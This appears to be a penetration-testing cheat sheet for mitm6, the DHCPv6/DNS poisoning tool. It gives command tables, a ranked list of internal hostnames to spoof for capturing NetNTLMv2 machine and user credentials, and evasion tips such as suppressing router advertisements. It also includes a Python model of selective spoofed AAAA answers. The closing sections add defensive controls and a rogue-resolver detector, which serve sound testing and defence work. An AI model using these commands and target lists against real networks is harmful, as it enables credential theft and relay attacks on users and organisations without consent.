mitm6 (DHCPv6/DNS/WPAD)

Spoof DHCPv6 so the client takes your host as its IPv6 DNS server, then answer only selected DNS queries (for example AAAA for wpad.<domain> or for internal hosts) with your own IPv6 address, so the client connects to attacker-controlled IPv6 endpoints. Both the machine account and logged-on users resolve these names, so this coerces machine and user authentication traffic to your host. mitm6 itself handles only the DHCPv6 and DNS side; the listener or relay that receives the coerced connections (typically ntlmrelayx) runs alongside it.

Quick start (usage)

Action                                          | Command
Launch with target domain                       | mitm6 -d <domain.fqdn>
Specify interface                               | mitm6 -i <iface> -d <domain.fqdn>
Ignore clients that send no DHCPv6 FQDN option  | mitm6 --ignore-nofqdn -d <domain.fqdn>

Targeted usage (minimize blast radius)

mitm6 poisons DHCPv6 so affected Windows hosts add your box as their IPv6 DNS server, which Windows then prefers over the IPv4 resolvers it already has. Every name you answer for is redirected on every poisoned client, so answering broadly (for example for a whole domain) degrades or breaks resolution on those hosts and gets noticed. Keep the impact low by allowlisting only the names and client hosts you need and staying silent on everything else, so hosts fall back to their existing resolvers.

Action                                                      | Command
Answer only for WPAD anywhere                               | mitm6 -d wpad
Answer only for specific hosts (exact FQDNs)                | mitm6 -d dc01.corp.local -d ca.corp.local
Exclude a sensitive hostname while answering for a domain   | mitm6 -d corp.local -b payroll.corp.local
Target only two client machines (and only WPAD)             | mitm6 -hw WIN10-01.corp.local -hw SRV-WEB01.corp.local -d wpad --ignore-nofqdn
Reduce detection surface (send no Router Advertisements)    | mitm6 -d <domain.fqdn> --no-ra

The host allowlist (-hw) is matched against the FQDN the client sends in its DHCPv6 FQDN option, which is why it is paired with --ignore-nofqdn: a client that sends no FQDN cannot be matched and should not be answered. With --no-ra you no longer provoke clients into re-soliciting, so you wait for their own DHCPv6 solicits (boot, link-up, lease renewal) and poisoning takes longer.

Note: mitm6 does not forward or proxy unmatched queries. It answers only names on the allowlist and stays silent on the rest, so for every other lookup the client waits out a timeout before trying its next configured DNS server. That delay is the main user-visible symptom of the attack, which is another reason to keep the allowlist small.

Hosts to target

Target names that domain-joined machines and users already contact with automatic authentication. Keep the allowlist tight.

Host / Service                          | Examples (names)                                        | Likely auth captured                     | Why target
WPAD (proxy auto-discovery)             | wpad, wpad.<domain>                                     | User NetNTLMv2 (proxy auth)              | Broadest, fastest user coverage when auto-detect is enabled.
Domain controllers (names clients resolve) | dc01.<domain>, dc02.<domain>                         | Machine$ NetNTLMv2 from many clients     | Endpoints constantly query DCs (LDAP/LDAPS/SYSVOL). You catch the clients, not the DC itself.
AD CS / PKI web endpoints               | ca.<domain>, pki.<domain>, certsrv.<domain>, ocsp.<domain> | User or Machine$ NetNTLMv2            | Auto-enrollment and certificate services often use HTTP with IWA.
DFS / file servers                      | dfs.<domain>, filesrv01.<domain>                        | User or Machine$ NetNTLMv2 (SMB)         | Logon scripts, mapped drives, and UNC paths trigger SMB auth.
Management infrastructure               | wsus.<domain>, mp01.<domain>, sccm.<domain>             | Machine$ NetNTLMv2                       | Agents poll regularly with integrated auth.
Intranet IWA sites                      | intranet.<domain>, sharepoint.<domain>                  | User NetNTLMv2 (HTTP)                    | Browsers use integrated auth to internal sites.

Notes
  • DCs and many servers are statically addressed and usually do not take DNS from DHCPv6, so you will not poison them; you are catching the clients that talk to their names.
  • Start with wpad for user credentials at scale, or allowlist a few high-value names plus a small set of client hosts (-hw) to go after specific Machine$ accounts.

What mitm6 is doing (mechanics)

  • Becomes the client's IPv6 DNS: Answers the DHCPv6 Solicit/Request that clients on the segment send with an Advertise/Reply that hands out an IPv6 address and names your host as the DNS server (DHCPv6 option 23). Windows then sends its name queries to you, ahead of the IPv4 resolvers it already had.
  • Wins resolution via IPv6 preference: For allowlisted names you answer (typically AAAA) with your own IPv6 address. Windows prefers IPv6 when a AAAA record resolves, so the client connects to you instead of the real host.
  • Leverages WPAD via DNS (when auto-detect is enabled): Clients query wpad.<domain> and you answer with your host. mitm6 only spoofs that DNS answer; the PAC file and the proxy authentication challenge (HTTP 407) that collects the user's NTLM response are served by the companion relay tool, typically ntlmrelayx.
  • Low persistence: mitm6 hands out short DHCPv6 lease and DNS TTL values, so clients revert within minutes after you stop. To force an immediate revert on a Windows client: ipconfig /release6, ipconfig /renew6, then ipconfig /flushdns.
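The two pieces above that decide what a poisoned client actually gets, the allowlist/blocklist filtering from the targeted-usage section and the spoofed AAAA answer, as an added example in plain Python. This is not mitm6's code: the matching rules (label-wise suffix match for -d/-b, a single-label pattern such as wpad modelled as matching the leftmost label, exact FQDN match for -hw/-hb) are a model of the behaviour this page describes, and the query bytes, the attacker address fe80::1 and the 100-second TTL are constructed for the example.

```python
"""Allowlist filtering plus the spoofed AAAA answer, as an added example.
NOT mitm6's own code: the matching rules below model the behaviour described
on this page rather than copying mitm6's implementation."""
import ipaddress
import struct

QTYPE_A, QTYPE_AAAA, QCLASS_IN = 1, 28, 1
DNS_TTL = 100  # assumed short TTL so spoofed answers expire soon after you stop


def _labels(name):
    """'WPAD.Corp.Local.' -> ['wpad', 'corp', 'local'] (case-insensitive, no trailing dot)."""
    return [label for label in name.lower().rstrip(".").split(".") if label]


def _matches(qname, pattern):
    """Label-wise suffix match: 'corp.local' covers dc01.corp.local but not
    notcorp.local. A single-label pattern such as 'wpad' is modelled here as
    matching the leftmost label, so it covers wpad.<any domain> (assumption)."""
    q, p = _labels(qname), _labels(pattern)
    if not p:
        return False
    if len(p) == 1:
        return q[:1] == p
    return q[-len(p):] == p


def should_answer_dns(qname, allow, block):
    """Blocklist (-b) wins over allowlist (-d); nothing outside the allowlist is answered."""
    if any(_matches(qname, b) for b in block):
        return False
    return any(_matches(qname, a) for a in allow)


def should_answer_dhcpv6(client_fqdn, host_allow, host_block, ignore_nofqdn):
    """Client filter for DHCPv6 (-hw / -hb / --ignore-nofqdn). client_fqdn is the
    DHCPv6 FQDN option the client sent, or None if it sent none."""
    if client_fqdn is None:
        return not ignore_nofqdn and not host_allow
    fqdn = client_fqdn.lower().rstrip(".")
    if any(fqdn == h.lower().rstrip(".") for h in host_block):
        return False
    return not host_allow or any(fqdn == h.lower().rstrip(".") for h in host_allow)


def build_query(qid, name, qtype=QTYPE_AAAA):
    """Constructed client query (what a Windows resolver sends to its DNS server)."""
    pkt = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    for label in _labels(name):
        pkt += bytes([len(label)]) + label.encode("ascii")
    return pkt + b"\x00" + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(pkt):
    """Return (id, name, qtype, qclass, raw question section) of a single-question query."""
    qid = struct.unpack("!H", pkt[:2])[0]
    off, labels = 12, []
    while pkt[off]:
        n = pkt[off]
        labels.append(pkt[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    off += 1  # root label terminator
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return qid, ".".join(labels), qtype, qclass, pkt[12:off + 4]


def spoofed_answer(query, attacker_ipv6, allow, block):
    """AAAA answer pointing the name at the attacker, or None to stay silent so the
    client falls back to its other resolvers. Only AAAA/IN questions are answered."""
    qid, name, qtype, qclass, question = parse_query(query)
    if qtype != QTYPE_AAAA or qclass != QCLASS_IN or not should_answer_dns(name, allow, block):
        return None
    header = struct.pack("!HHHHHH", qid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA; 1 question, 1 answer
    rr = b"\xc0\x0c"  # compression pointer to the question name at offset 12
    rr += struct.pack("!HHIH", QTYPE_AAAA, QCLASS_IN, DNS_TTL, 16)
    rr += ipaddress.IPv6Address(attacker_ipv6).packed
    return header + question + rr


def answered_address(response):
    """IPv6 address carried in a spoofed_answer() response (for checking the result)."""
    return str(ipaddress.IPv6Address(response[-16:]))


if __name__ == "__main__":
    allow, block = ["wpad", "corp.local"], ["payroll.corp.local"]
    for qname, qtype in [("wpad.corp.local", QTYPE_AAAA), ("dc01.corp.local", QTYPE_AAAA),
                         ("payroll.corp.local", QTYPE_AAAA), ("dc01.corp.local", QTYPE_A)]:
        resp = spoofed_answer(build_query(0x1234, qname, qtype), "fe80::1", allow, block)
        print(qname, qtype, "->", answered_address(resp) if resp else "silent")
```

The point to notice is the None path: a blocklisted name, a name outside the allowlist, or a non-AAAA question all produce no packet at all rather than NXDOMAIN, which is what lets the client fall back to its real resolvers and keeps the blast radius to the names you chose.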

Notes / OPSEC

  • Controls that break it: DHCPv6 Guard and RA Guard on the switches, a host firewall rule that blocks outbound DHCPv6 (UDP 546/547) so clients never solicit, clients with IPv6 or WPAD auto-detect disabled, and environments that do not use DHCPv6 for DNS at all. SMB signing, LDAP signing and channel binding do not stop the poisoning but neuter the relay that usually follows it.
  • Windows-centric behaviour: Windows solicits DHCPv6 by default and accepts DNS servers from it; many non-Windows clients take resolvers from Router Advertisements (RDNSS) instead and may be unaffected.
  • Same-segment requirement: DHCPv6 Solicits go to the link-local multicast group ff02::1:2, so you need L2 adjacency to the clients to see and answer them.
  • Interface prep: Ensure the attacking NIC has a valid IPv6 link-local address; mitm6 sends from it and advertises it as the DNS server.
  • Noise: The periodic rogue Router Advertisements are the most commonly alerted-on part of the attack (RA Guard, IDS signatures); --no-ra trades speed for silence.
  • Scope carefully: Keep allowlists tight, answer only for in-scope names and hosts, and stop mitm6 as soon as you have what you need, since every minute it runs degrades resolution for the poisoned clients.
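The defensive side of the controls listed above, as an added example that is not part of mitm6 or of this page: a small DHCPv6 parser that inspects an Advertise/Reply and flags a DNS Recursive Name Server option (code 23) naming a resolver outside the trusted set. It only decodes message bytes; feeding it packets from a capture or a span port is assumed to happen elsewhere. The trusted resolver 2001:db8:c0ff:ee::53, the domain corp.local, the DUID and both messages are constructed for the example.

```python
"""Added example (not mitm6 code): spot a rogue IPv6 resolver in a DHCPv6
Advertise/Reply, the message mitm6 uses to insert itself as the client's DNS.
The packets below are constructed for this example, not captured traffic."""
import ipaddress
import struct

# DHCPv6 message types and option codes (RFC 8415, RFC 3646)
MSG_SOLICIT, MSG_ADVERTISE, MSG_REPLY = 1, 2, 7
OPT_CLIENTID, OPT_SERVERID, OPT_DNS_SERVERS, OPT_DOMAIN_LIST = 1, 2, 23, 24


def parse_dhcpv6(pkt):
    """Return (msg_type, transaction_id, {option_code: [raw option data, ...]})."""
    if len(pkt) < 4:
        raise ValueError("DHCPv6 header truncated")
    msg_type, txid = pkt[0], pkt[1:4]
    options, off = {}, 4
    while off < len(pkt):
        if off + 4 > len(pkt):
            raise ValueError("DHCPv6 option header truncated")
        code, length = struct.unpack("!HH", pkt[off:off + 4])
        data = pkt[off + 4:off + 4 + length]
        if len(data) != length:
            raise ValueError("DHCPv6 option %d truncated" % code)
        options.setdefault(code, []).append(data)
        off += 4 + length
    return msg_type, txid, options


def dns_servers(options):
    """IPv6 addresses from every DNS Recursive Name Server option (code 23)."""
    servers = []
    for data in options.get(OPT_DNS_SERVERS, []):
        if len(data) % 16:
            raise ValueError("option 23 length is not a multiple of 16")
        servers += [ipaddress.IPv6Address(data[i:i + 16]) for i in range(0, len(data), 16)]
    return servers


def search_domains(options):
    """Names from the Domain Search List option (code 24), DNS label encoding."""
    names = []
    for data in options.get(OPT_DOMAIN_LIST, []):
        off = 0
        while off < len(data):
            labels = []
            while data[off]:
                n = data[off]
                labels.append(data[off + 1:off + 1 + n].decode("ascii"))
                off += 1 + n
            off += 1  # root label terminator
            names.append(".".join(labels))
    return names


def rogue_resolver_findings(pkt, trusted_resolvers):
    """Strings describing resolvers outside the trusted set in an Advertise/Reply.
    Link-local resolvers are called out separately: production DHCPv6 rarely hands
    one out, while mitm6 answers from the attacking NIC's link-local address."""
    msg_type, _, options = parse_dhcpv6(pkt)
    if msg_type not in (MSG_ADVERTISE, MSG_REPLY):
        return []
    trusted = {ipaddress.IPv6Address(a) for a in trusted_resolvers}
    findings = []
    for srv in dns_servers(options):
        if srv in trusted:
            continue
        kind = "link-local resolver" if srv.is_link_local else "untrusted resolver"
        findings.append("%s: %s" % (kind, srv))
    return findings


def build_reply(msg_type, txid, resolvers, domain):
    """Constructed DHCPv6 message carrying options 2, 23 and 24 (sample data only)."""
    def opt(code, data):
        return struct.pack("!HH", code, len(data)) + data
    labels = b"".join(bytes([len(l)]) + l.encode("ascii") for l in domain.split(".")) + b"\x00"
    return (bytes([msg_type]) + txid
            + opt(OPT_SERVERID, b"\x00\x01\x00\x01example-duid")
            + opt(OPT_DNS_SERVERS, b"".join(ipaddress.IPv6Address(r).packed for r in resolvers))
            + opt(OPT_DOMAIN_LIST, labels))


TRUSTED = ["2001:db8:c0ff:ee::53"]  # assumed corporate IPv6 resolver
LEGIT = build_reply(MSG_REPLY, b"\x01\x02\x03", TRUSTED, "corp.local")
ROGUE = build_reply(MSG_REPLY, b"\x0a\x0b\x0c", ["fe80::1"], "corp.local")  # attacker link-local

if __name__ == "__main__":
    for name, pkt in [("legit", LEGIT), ("rogue", ROGUE)]:
        print(name, search_domains(parse_dhcpv6(pkt)[2]), rogue_resolver_findings(pkt, TRUSTED))
```

Solicit messages are ignored on purpose: they come from clients, and alerting on them would fire on every Windows host's normal behaviour. On a network that does not run DHCPv6 at all, any Advertise or Reply seen on the wire is itself the finding, and the trusted set can simply be left empty.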